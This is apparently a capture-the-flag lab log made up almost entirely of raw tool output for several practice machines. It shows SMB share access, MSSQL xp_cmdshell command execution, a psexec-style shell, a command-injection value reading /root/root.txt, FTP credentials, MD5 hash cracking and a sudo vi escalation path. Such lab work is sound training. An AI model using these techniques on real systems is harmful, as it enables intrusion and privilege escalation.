```
Nmap scan report for 10.10.10.27
Host is up (0.51s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
```

```
smbmap -H 10.10.10.27 -u test
[+] Guest session       IP: 10.10.10.27:445     Name: 10.10.10.27
        Disk                    Permissions     Comment
        ----                    -----------     -------
        ADMIN$                  NO ACCESS       Remote Admin
        backups                 READ ONLY
        C$                      NO ACCESS       Default share
        IPC$                    READ ONLY       Remote IPC
```
An empty password is enough to log in.
```
smbclient \\\\10.10.10.27\\backups -U test
Enter WORKGROUP\test's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Jun  4 12:10:59 2021
  ..                                  D        0  Fri Jun  4 12:10:59 2021
  prod.dtsConfig                     AR      609  Mon Jan 20 20:23:02 2020
  schtasks.txt                        A   174006  Fri Jun  4 12:05:57 2021
  services.txt                        A     6370  Fri Jun  4 12:10:59 2021

                10328063 blocks of size 4096. 8165400 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
```
```
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> enable_xp_cmdshell
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell whoami
output
```

```
Password:
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file OFvCNrQJ.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service SMtb on 10.10.10.27.....
[*] Starting service SMtb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
```
```
Nmap scan report for 10.10.10.28
Host is up (0.68s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

```
------------------ : EV Bug Tracker : ------------------

Provide Bug ID: ;cat$IFS$9/root/root.txt
---------------

cat: /root/reports/: Is a directory
af13b0bee69f8a877c3faf667f7beacf
```
Port scan
```
nmap -sV -sT -Pn 10.10.10.46
Nmap scan report for 10.10.10.46
Host is up (0.59s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```
Exploitation

The credentials ftpuser / mc@F1l3ZilL4 can be used to login to the FTP server. (official walkthrough)
```
ftp 10.10.10.46
Connected to 10.10.10.46.
220 (vsFTPd 3.0.3)
Name (10.10.10.46:root): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            2533 Feb 03  2020 backup.zip
226 Directory send OK.
ftp> get backup.zip
local: backup.zip remote: backup.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
226 Transfer complete.
2533 bytes received in 0.23 secs (10.7549 kB/s)
```

```
echo -n "2cb42f8734ea607eefed3b70af13bbd3" > passwd
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt passwd
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hashtype, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
qwerty789        (?)
1g 0:00:00:00 DONE (2021-06-05 19:16) 33.33g/s 3340Kp/s 3340Kc/s 3340KC/s shunda..pogimo
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session complete
```

```
Matching Defaults entries for postgres on vaccine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
```
```
Nmap scan report for 10.10.10.29
Host is up (0.38s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
3306/tcp open  mysql   MySQL (unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

```
Host Name:                 SHIELD
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00376-30000-00299-AA303
Original Install Date:     2/4/2020, 12:58:01 PM
System Boot Time:          6/5/2021, 8:21:33 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 753 MB
Virtual Memory: Max Size:  2,431 MB
Virtual Memory: Available: 1,015 MB
Virtual Memory: In Use:    1,416 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    MEGACORP.LOCAL
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.29
                                 [02]: fe80::98f9:2cd0:ff27:3fbc
                                 [03]: dead:beef::98f9:2cd0:ff27:3fbc
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
```

```
Privilege Name          Description                               State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled
```

```
Nmap scan report for 10.10.10.30
Host is up (0.57s latency).
Not shown: 9987 closed ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-06-08 13:22:07Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows
```